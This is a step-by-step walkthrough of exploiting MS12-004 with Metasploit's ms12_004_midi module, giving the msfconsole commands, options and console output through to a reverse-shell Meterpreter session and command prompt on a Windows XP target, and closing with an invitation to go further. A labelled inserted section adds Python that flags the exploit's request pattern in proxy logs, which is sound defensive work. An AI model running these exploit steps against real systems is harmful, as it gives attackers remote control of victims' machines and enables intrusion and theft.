On exploiting the MS12-004 vulnerability
1. Open the msf console
root@kali:~# msfconsole
PS: you may need this first: /etc/init.d/postgresql start (requires administrator privileges)
2. Search for the exploit module
msf > search 12_004

Matching Modules
================

   Name                                   Disclosure Date  Rank    Description
   ----                                   ---------------  ----    -----------
   exploit/windows/browser/ms12_004_midi  2012-01-10       normal  MS12-004 midiOutPlayNextPolyEvent Heap Overflow
3. Select the exploit
msf > use exploit/windows/browser/ms12_004_midi
The prompt changes to: msf exploit(ms12_004_midi) >
4. Show the configuration options
msf exploit(ms12_004_midi) > show options

Module options (exploit/windows/browser/ms12_004_midi):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  false            no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
5. Set SRVHOST (the IP address of this machine)
msf exploit(ms12_004_midi) > set SRVHOST 192.168.43.80
SRVHOST => 192.168.43.80
6. Set URIPATH (the name of the page the target will visit; any value)
msf exploit(ms12_004_midi) > set URIPATH 1
URIPATH => 1
7. Run the exploit
msf exploit(ms12_004_midi) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.43.80:4444
msf exploit(ms12_004_midi) > [*] Using URL: http://192.168.43.80:8080/1
[*] Server started.
8. Have the target visit this URL: http://192.168.43.80:8080/1
The following is what the console shows after the target visits the URL:
[*] 192.168.43.35 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35 ms12_004_midi - Sending html to 192.168.43.35:1090...
[*] 192.168.43.35 ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
[*] 192.168.43.35 ms12_004_midi - Sending midi corruption file...
[*] 192.168.43.35 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35 ms12_004_midi - Sending html to 192.168.43.35:1094...
[*] 192.168.43.35 ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
[*] 192.168.43.35 ms12_004_midi - Sending midi corruption file...
[*] 192.168.43.35 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35 ms12_004_midi - Sending midi corruption file...
[*] Sending stage (957487 bytes) to 192.168.43.35
msf exploit(ms12_004_midi) > [*] Meterpreter session 1 opened (192.168.43.80:4444 -> 192.168.43.35:1096) at 2017-07-16 02:11:59 -0400
[*] Session ID 1 (192.168.43.80:4444 -> 192.168.43.35:1096) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3612)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3324
[+] Successfully migrated to process
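From the defender's side, the console output above has a recognisable shape: the same client fetches the same URL first with a browser User-Agent and then, seconds later, with a Windows-Media-Player User-Agent, which is when the malformed MIDI file is delivered. The following is an added example (not part of the original post) that flags that sequence in a proxy log; the log format and the sample lines are constructed for the example, and a real deployment would have to adapt the parser to its own proxy's format.

```python
import re
from datetime import datetime, timedelta

# Constructed sample proxy log (not real traffic), modelled on the request
# sequence in the msfconsole output: timestamp, client IP, method, URL, quoted UA.
SAMPLE_PROXY_LOG = """\
2017-07-16T02:11:40 192.168.43.35 GET http://192.168.43.80:8080/1 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2017-07-16T02:11:41 192.168.43.35 GET http://192.168.43.80:8080/1 "Windows-Media-Player/9.00.00.3250"
2017-07-16T02:11:55 192.168.43.35 GET http://192.168.43.80:8080/1 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2017-07-16T02:15:00 192.168.43.50 GET http://intranet.example/news.html "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
2017-07-16T02:15:02 192.168.43.50 GET http://media.example/song.mid "Windows-Media-Player/9.00.00.3250"
"""

# Hypothetical log line layout assumed for this example.
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def parse_line(line):
    """Parse one constructed proxy log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, client, method, url, ua = m.groups()
    return {"ts": datetime.fromisoformat(ts), "client": client,
            "method": method, "url": url, "ua": ua}


def find_midi_fetch_after_browser(log_text, window=timedelta(seconds=30)):
    """Return (client, url) pairs where one client requested the same URL first
    with a browser UA and then, within `window`, with a Windows-Media-Player UA.
    A legitimate page and a separate media file have different URLs and are not flagged."""
    browser_seen = {}  # (client, url) -> timestamp of the most recent browser request
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        key = (rec["client"], rec["url"])
        if rec["ua"].startswith("Mozilla/"):
            browser_seen[key] = rec["ts"]
        elif rec["ua"].startswith("Windows-Media-Player/"):
            first = browser_seen.get(key)
            if first is not None and rec["ts"] - first <= window and key not in hits:
                hits.append(key)
    return hits
```

On the sample log only the 192.168.43.35 client is reported; the 192.168.43.50 client fetched a page and a media file from different URLs, which is the normal pattern.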
9. Interact with the session ID that was obtained
msf exploit(ms12_004_midi) > sessions -i 1
[*] Starting interaction with 1...
10. After the session is obtained the prompt becomes: meterpreter >
meterpreter > shell
Process 1552 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>
From here on, the stage is yours!
A quick Baidu search will tell you exactly what can be done at this point.